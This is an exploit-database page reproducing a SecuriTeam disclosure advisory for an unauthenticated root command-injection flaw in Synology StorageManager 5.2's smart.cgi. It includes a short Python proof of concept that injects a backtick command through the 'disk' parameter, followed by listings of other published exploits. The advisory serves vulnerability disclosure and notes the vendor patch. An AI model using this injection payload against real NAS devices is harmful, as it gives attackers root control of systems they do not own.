Menu

Search for hundreds of thousands of exploits

"Synology StorageManager 5.2 - Root Remote Command Execution"

Author

Exploit author

SecuriTeam

Platform

Exploit platform

cgi

Release date

Exploit published date

2017-11-28

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
'''
SSD Advisory – Synology StorageManager smart.cgi Remote Command Execution

Full report: https://blogs.securiteam.com/index.php/archives/3540
Twitter: @SecuriTeam_SSD
Weibo: SecuriTeam_SSD


Vulnerability Summary
The following advisory describes a remote command execution vulnerability
found in Synology StorageManager.

Storage Manager is “a management application that helps you organize and
monitor the storage capacity on your Synology NAS. Depending on the model
and number of installed hard drives, Storage Manager helps you accomplish
the following tasks:

Create different types of RAID and non-RAID storage configurations, such as
volumes, disk/RAID groups, iSCSI LUNs, and iSCSI Targets.
Monitor the overall storage usage of your Synology NAS.
Inspect the health of installed hard drives and solid state drives.
Use advanced options, such as hot spare drives, SSD TRIM, SSD cache, and
more.”

Credit
An independent security researcher, Nigusu Kassahun, has reported this
vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program

Vendor response
Synology has released patches to address this vulnerability – DSM 5.2-5967-5

For more information: https://www.synology.com/en-global/releaseNote/DS210+

Vulnerability details
User controlled input is not sufficiently sanitized, and then passed to
execve function.

Successful exploitation of this vulnerability enables a remote
unauthenticated user to run commands as root on the machine.

The vulnerable parameter can be found in
/webman/modules/StorageManager/smart.cgi with parameter
action=apply&operation=quick&disk=%2Fdev%2Fsda

Proof of Concept

===
'''

# Synology StorageManager <= 5.2 Remote Root Command Execution


import httplib


HOST = raw_input("Enter Host: ")


#IDOR to bypass auth and ticks to chain commands

conn = httplib.HTTPConnection(HOST)

conn.request("GET","/webman/modules/StorageManager/smart.cgi?action=apply&operation=quick&disk=/dev/sda`id%20>/tmp/LOL`")

res = conn.geresponse()

print res.status, res.reason
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-11-19 "Gemtek WVRTM-127ACN 01.01.02.141 - Authenticated Arbitrary Command Injection" webapps cgi "Gabriele Zuddas"
2020-10-29 "Mailman 1.x > 2.1.23 - Cross Site Scripting (XSS)" webapps cgi "Valerio Alessandroni"
2020-04-23 "Zen Load Balancer 3.10.1 - Directory Traversal (Metasploit)" webapps cgi "Dhiraj Mishra"
2020-04-10 "Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal" webapps cgi "Basim Alabdullah"
2020-03-30 "Zen Load Balancer 3.10.1 - Remote Code Execution" webapps cgi "Cody Sixteen"
2020-02-11 "CHIYU BF430 TCP IP Converter - Stored Cross-Site Scripting" webapps cgi Luca.Chiou
2019-09-09 "Rifatron Intelligent Digital Security System - 'animate.cgi' Stream Disclosure" webapps cgi LiquidWorm
2019-07-12 "Citrix SD-WAN Appliance 10.2.2 - Authentication Bypass / Remote Command Execution" webapps cgi "Chris Lyne"
2019-02-18 "Master IP CAM 01 3.3.4.2103 - Remote Command Execution" webapps cgi "Raffaele Sabato"
2019-02-11 "Smoothwall Express 3.1-SP4 - Cross-Site Scripting" webapps cgi "Ozer Goker"
Release Date Title Type Platform Author
2018-10-04 "Cisco Prime Infrastructure - Unauthenticated Remote Code Execution" remote multiple SecuriTeam
2018-04-30 "Linux Kernel < 4.17-rc1 - 'AF_LLC' Double Free" dos linux SecuriTeam
2018-01-30 "Hotspot Shield - Information Disclosure" local windows SecuriTeam
2018-01-29 "iBall WRA150N - Multiple Vulnerabilities" webapps hardware SecuriTeam
2018-01-24 "Oracle VirtualBox < 5.1.30 / < 5.2-rc1 - Guest to Host Escape" local multiple SecuriTeam
2018-01-15 "GitStack - Remote Code Execution" webapps php SecuriTeam
2018-01-11 "Seagate Personal Cloud - Multiple Vulnerabilities" remote hardware SecuriTeam
2017-12-26 "Trustwave SWG 11.8.0.27 - SSH Unauthorized Access" remote linux SecuriTeam
2017-12-19 "Ichano AtHome IP Cameras - Multiple Vulnerabilities" remote hardware SecuriTeam
2017-12-13 "vBulletin 5 - 'cacheTemplates' Remote Arbitrary File Deletion" webapps multiple SecuriTeam
2017-12-13 "vBulletin 5 - 'routestring' Remote Code Execution" webapps multiple SecuriTeam
2017-12-06 "Dasan Networks GPON ONT WiFi Router H640X 12.02-01121 / 2.77p1-1124 / 3.03p2-1146 - Remote Code Execution" webapps hardware SecuriTeam
2017-11-28 "Synology StorageManager 5.2 - Root Remote Command Execution" webapps cgi SecuriTeam
2017-11-23 "Linux Kernel (Ubuntu 17.04) - 'XFRM' Local Privilege Escalation" local linux SecuriTeam
2017-11-21 "DblTek - Multiple Vulnerabilities" webapps linux SecuriTeam
2017-11-07 "Ametys CMS 4.0.2 - Password Reset" webapps php SecuriTeam
2017-11-03 "GraphicsMagick - Memory Disclosure / Heap Overflow" dos multiple SecuriTeam
2017-11-01 "Cisco UCS Platform Emulator 3.1(2ePE1) - Remote Code Execution" remote linux SecuriTeam
2017-10-23 "K7 Total Security 15.1.0.305 - Device Driver Arbitrary Memory Read" dos windows SecuriTeam
2017-10-17 "Linux Kernel - 'AF_PACKET' Use-After-Free" dos linux SecuriTeam
2017-10-17 "Linux Kernel - 'AF_PACKET' Use-After-Free" dos linux SecuriTeam
2017-10-16 "Ikraus Anti Virus 2.16.7 - Remote Code Execution" remote windows SecuriTeam
2017-10-13 "FiberHome - Directory Traversal" webapps linux SecuriTeam
2017-10-09 "PHP Melody 2.7.3 - Multiple Vulnerabilities" webapps php SecuriTeam
2017-10-09 "QNAP HelpDesk < 1.1.12 - SQL Injection" webapps php SecuriTeam
2017-09-11 "Hanbanggaoke IP Camera - Arbitrary Password Change" webapps hardware SecuriTeam
2017-09-07 "McAfee LiveSafe 16.0.3 - Man In The Middle Registry Modification Leading to Remote Command Execution" webapps hardware SecuriTeam
2017-08-30 "Oracle Java JDK/JRE < 1.8.0.131 / Apache Xerces 2.11.0 - 'PDF/Docx' Server Side Denial of Service" dos php SecuriTeam
2017-08-03 "Tiandy IP Cameras 5.56.17.120 - Sensitive Information Disclosure" webapps hardware SecuriTeam
2017-08-03 "Horde Groupware 5.2.21 - Unauthorized File Download" webapps php SecuriTeam 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected